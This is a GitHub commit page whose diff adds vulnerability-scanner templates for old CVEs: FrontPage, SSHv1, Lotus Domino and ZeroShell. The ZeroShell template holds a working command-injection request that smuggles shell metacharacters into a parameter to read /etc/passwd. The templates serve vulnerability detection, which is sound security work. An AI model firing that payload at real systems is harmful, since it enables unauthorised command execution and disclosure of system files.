-
Notifications
You must be signed in to change notification settings - Fork 52
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
test
committed
Aug 28, 2024
1 parent
d1f8a67
commit dfd6778
Showing
3,693 changed files
with
366,594 additions
and
68,517 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
id: CVE-2000-0114 | ||
|
||
info: | ||
name: Microsoft FrontPage Extensions Check (shtml.dll) | ||
author: r3naissance | ||
severity: low | ||
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114 | ||
- https://www.exploit-db.com/exploits/19897 | ||
classification: | ||
cve-id: CVE-2000-0114 | ||
remediation: Upgrade to the latest version. | ||
tags: cve,cve2000,frontpage,microsoft,edb | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/_vti_inf.html' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
part: body | ||
words: | ||
- "_vti_bin/shtml.dll" | ||
|
||
# Enhanced by mp on 2022/01/27 |
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
id: CVE-2001-1473 | ||
info: | ||
name: Deprecated SSHv1 Protocol Detection | ||
author: iamthefrogy | ||
severity: high | ||
tags: cve,cve2001,network,ssh,openssh | ||
description: SSHv1 is deprecated and has known cryptographic issues. | ||
remediation: Upgrade to SSH 2.4 or later. | ||
reference: | ||
- https://www.kb.cert.org/vuls/id/684820 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473 | ||
classification: | ||
cvss-score: 7.4 | ||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N | ||
cve-id: CVE-2001-1473 | ||
cwe-id: CWE-310 | ||
network: | ||
- host: | ||
- "{{Hostname}}" | ||
- "{{Host}}:22" | ||
matchers: | ||
- type: word | ||
words: | ||
- "SSH-1" | ||
|
||
# Updated by Chris on 2022/01/21 |
This file was deleted.
Oops, something went wrong.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: CVE-2005-2428 | ||
info: | ||
name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure | ||
author: CasperGN | ||
severity: medium | ||
tags: cve,cve2005,domino | ||
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). | ||
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. | ||
reference: | ||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf | ||
- https://www.exploit-db.com/exploits/39495 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | ||
cvss-score: 5.3 | ||
cve-id: CVE-2005-2428 | ||
cwe-id: CWE-200 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/names.nsf/People?OpenView" | ||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
- type: regex | ||
name: domino-username | ||
regex: | ||
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)' | ||
part: body | ||
|
||
# Enhanced by mp on 2022/02/02 |
This file was deleted.
Oops, something went wrong.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file was deleted.
Oops, something went wrong.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
id: CVE-2009-0545 | ||
|
||
info: | ||
name: ZeroShell <= 1.0beta11 Remote Code Execution | ||
author: geeknik | ||
severity: critical | ||
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. | ||
reference: | ||
- https://www.exploit-db.com/exploits/8023 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545 | ||
- http://www.zeroshell.net/eng/announcements/ | ||
- http://www.ikkisoft.com/stuff/LC-2009-01.txt | ||
classification: | ||
cve-id: CVE-2009-0545 | ||
tags: cve,cve2009,zeroshell,kerbynet,rce | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" | ||
|
||
matchers: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "root:.*:0:0:" | ||
|
||
# Enhanced by mp on 2022/04/18 |
File renamed without changes.
File renamed without changes.
Oops, something went wrong.